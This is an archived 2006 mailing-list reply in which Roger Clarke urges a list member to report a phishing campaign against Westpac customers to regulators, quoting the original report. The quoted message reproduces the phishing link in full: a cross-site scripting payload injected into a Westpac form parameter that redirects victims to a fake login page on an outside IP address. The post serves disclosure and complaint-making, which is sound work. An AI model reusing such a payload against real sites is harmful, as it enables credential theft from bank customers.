[LINK] Phishing plumbs new depths for Westpac Customers: XSS

Roger Clarke Roger.Clarke at xamax.com.au
Tue Nov 21 12:18:44 AEDT 2006


Rick, please send this in the form of a complaint to:
-   the Privacy Commissioner
-   the ABA
-   AGIMO
-   AusCERT

Sure, they'll all fall over backwards flick-passing it to one 
another.  But there's a lot of nervousness in the Internet Banking 
security arena at present, and your good, solid detail could really 
hit the spot.

Make sure they understand that there are *two* incident reports in one:
-   the new form of phish
-   the completely inadequate incident reporting mechanism

You could also draw attention to the complaints-handling standards:
AS 4269:1995
ISO 10002:2004

At grave risk of telling you how to suck eggs:
http://www.privacy.org.au/Resources/Complaints.html


At 11:02 +1100 21/11/06, Rick Welykochy wrote:
>Just ran across this attempt at phishing for my Westpac username and password:
>(snipped from the phishing email)
>
>
>   Westpac Banking
>
>   No additional action is required by you to continue to
>   use your online services.
>
>   To review the changes [to Terms and Conditions], click on the link below:
>
>and here is the link:
>
>   https://www.westpac.com.au/forms/AskWestpac.nsf/
>   f_askWestpac?OpenForm&refTitle=<script>document.location=
>   'http://203.144.80.87/manual/.modonline/new.html'</script>
>
>I broke up the link into 3 parts for readability. The link does actually
>look valid, it takes you to the Westpac secure web site, but then the
>XSS (cross-site scripting) redirects you to a fake login page at
>http://203.144.80.87/manual/.modonline/new.html.
>
>Try http://tinyurl.com/tksrx if you wish to see it in action.
>
>I'm afraid this one might catch all but the technically savvy amongst us.
>
>Westpac has been contacted about this. Unfortunately, their website has
>web-based forms only for email and no interface is provided to alert their
>IT staff to the existence of such a hoax as the one above. I had to submit
>the email and further details via a pitifully inadequate web form. I have
>my doubts as to how far into the system my alert will survive. And I note
>with some annoyance that the link for actual feedback does not work (never
>returns a page) so I had to use a far less appropriate page.
>
>The page that would not respond to my browser is here:
>http://www.westpac.com.au/Forms/single_page_forms.nsf/f_customerServiceFeedbackServiceProblem
>Can other Linkers actually see this page? I cannot, neither with Firefox
>nor with Safari.
>
>
>
>cheers
>rickw
>
>
>
>
>--
>_________________________________
>Rick Welykochy || Praxis Services
>
>Welcome to the department of redundancy department.
>
>_______________________________________________
>Link mailing list
>Link at mailman.anu.edu.au
>http://mailman.anu.edu.au/mailman/listinfo/link

-- 
Roger Clarke                  http://www.anu.edu.au/people/Roger.Clarke/

Xamax Consultancy Pty Ltd      78 Sidaway St, Chapman ACT 2611 AUSTRALIA
                    Tel: +61 2 6288 1472, and 6288 6916
mailto:Roger.Clarke at xamax.com.au                http://www.xamax.com.au/

Visiting Professor in Info Science & Eng  Australian National University
Visiting Professor in the eCommerce Program      University of Hong Kong
Visiting Professor in the Cyberspace Law & Policy Centre      Uni of NSW


